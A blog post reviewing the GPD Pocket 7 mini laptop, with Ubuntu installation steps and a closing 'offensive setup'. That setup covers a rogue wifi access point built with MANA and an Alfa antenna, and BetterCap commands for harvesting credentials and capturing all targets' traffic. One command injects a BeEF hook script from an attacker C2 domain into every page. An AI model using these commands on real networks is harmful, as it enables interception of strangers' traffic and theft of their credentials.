GPD Pocket 7: Impressions, GNU/Linux Installation and Offensive Setup
It’s no secret I’ve been recently playing with the GPD Pocket 7, an ultra small laptop which can run GNU/Linux and has more than decent hardware. Tablets are cool and everything, but I’ve been a fan of ultra portable Linux devices since the Sharp Zaurus series. Considering that a lot of people were interested I decided to write this post to share my impressions, installation procedure and configuration tips.
Specs
Let’s start with the hardware specs of this sweet little thing:
- 7-inch full-HD (1920×1200) IPS touch display
- Intel Atom x7-Z8750 CPU (Quad Core) @ 1.6GHz
- 8GB RAM
- 128GB eMMC
- 7,000 mAh battery (12 hours battery life estimated)
- 802.11ac WiFi
- Bluetooth 4.1
- 1x USB 3.0 Type-C
- 1x USB 3.0 Type-A
- micro HDMI
- 3.5mm headphone jack
Not bad at all! right?
Installing GNU/Linux
Despite they should start shipping the Ubuntu 16.04 models in a few days (?), I decided to buy the Windows version, which means I had to install GNU/Linux from scratch and overcome/fix several hardware issues … since I’m a good guy, let me share with you the correct procedure :D
- Download your GNU/Linux distribution ISO ( in my case, it was Ubuntu 17.04 ).
- Clone this repository and run the
bootstrap-iso.sh
script against the ISO file. - Write the resulting
~/bootstrap.iso
file to an USB drive using UNetBootin or whatever you like. - Plug the USB drive to your GPD, turn it on and press the
DEL
button to enter BIOS and boot from it.
This will start the usual GNU/Linux installation procedure.
NOTE: Data on USB Type-C still does not work, but efforts are being made about it, we only need to wait.
Updating custom Kernel and stuff.
After installation and the routine system update, you might want to periodically update the fixes and custom kernel from the repository, in order to do so you should run the gpd-update
script as root, this will take 2-3 hours since the kernel is going to be compiled on the device itself.
If you are running Ubuntu 17.04 as me and are experiencing this issue, you might want to do the following instead:
Make sure apt is not locked and you have internet connectivity first.
sudo rm -rf /usr/src/ansible-gpdpocket
sudo git clone https://github.com/cawilliamson/ansible-gpdpocket.git /usr/src/ansible-gpdpocket
cd /usr/src/ansible-gpdpocket
sudo git reset --hard origin/master
Before you continue, edit the roles/boot/tasks/debian.yml
file and remove this block from it:
- name: install intel-microcode (iso creation = no)
apt: name=intel-microcode
when: chroot == false
tags:
- boot
( Don’t worry, you already have Intel microcode installed )
And eventually start the update process itself:
sudo ANSIBLE_NOCOWS=1 ansible-playbook system.yml
After the update is over, reboot and you’re ready to go :)
Getting Offensive
At this point, you have a quad core Intel cpu, GNU/Linux and an USB 3.0 port, I mean, imagination is the limit!
Personally, I like to have an Anker Astro E7 powerbank connected to the USB Type-C and the hardware I need to the USB 3.0 port (maybe with some USB 3 hub, to have appropriate bandwidth, powered by the same powerbank), then I can attach pretty much whatever I want to it, including an Alfa antenna, an Ubertooth One (great also to have a 2.4Ghz portable spectrum analyzer!) or some SDR card (most of SDR applications will require the full bandwidth of the USB port, which means it’s unlikely you’ll be able to use something else at the same time).
Here’s a very ugly PoC of what I mean, I’m still waiting for a decent USB hub to be delivered by Amazon:
In its simplest form, my portable offensive configuration is:
- GPD powered by the aforementioned powerbank.
- Main WiFi card connected to my smartphone (which is tethering via WiFi AP) as upstream.
- Alfa AWUS036NHR 2000mW with a HUACAM HCM82 8dBi dualband antenna for rogue AP and packet injection.
- Sensepost MANA running in
simple-nat
mode. - BetterCap for credentials harvesting, pcap capture and reporting.
sudo bettercap --no-spoofing --no-discovery -I YOUR_ALFA_INTERFACE -X
Or, if you feel really evil, you can also have the HTTP proxy inject your BEEF hook to every page:
sudo bettercap ...same as before... --proxy-module injectjs --js-url http://your-beef-c2-domain/hook.js
If you’ll make bettercap save everything to a pcap file, this file will contains the traffic of all the targets and it will potentially become very big, I suggest you to use the USB hub and attach an external drive as well. Then just make bettercap write to it with appropriate command line arguments for offline inspection and credentials harvesting.
sudo bettercap ...same... --sniffer-output /media/your/usbdrive/capture.pcap
… GOODBYE WIFI PINEAPPLE! :D
Impressions & Links
TL;DR: This device is awesome, expensive, but still, awesome.
Keyboard
Yes the layout is a very weird displaced QWERTY and yes the keys are small … you’ll get used to it unless you have very big hands.
Battery Life
I didn’t try the battery life as I always use the powerbank (the USB devices are draining power, that would kill the internal 7000mAh battery), but people said they achieved 3 hours of intense gaming on Windows, normal use on GNU/Linux should last quite long.
Display
Great definition and the touchscreen helps a lot navigating the menu … actually this is the very first time I find a touch screen to be really useful on Linux :D
Mouse
Yeah the “mouse” is crap, but usable … as I said, touchscreen FTW!
Price
Expensive, from 500 to 600 USD … it’s a little nice toy but you’ll have to pay for it.
Speed / Usability
Despite being an Atom, the CPU works great, as long as you don’t spawn 1000000000 apps you’ll do just fine … I mean, if you can run a rogue GSM BTS on a RPi, this hardware is actually more than just fine.
Connectivity
Internal WiFi is super stable and has decent coverage, Bluetooth also works great.
Links
Check …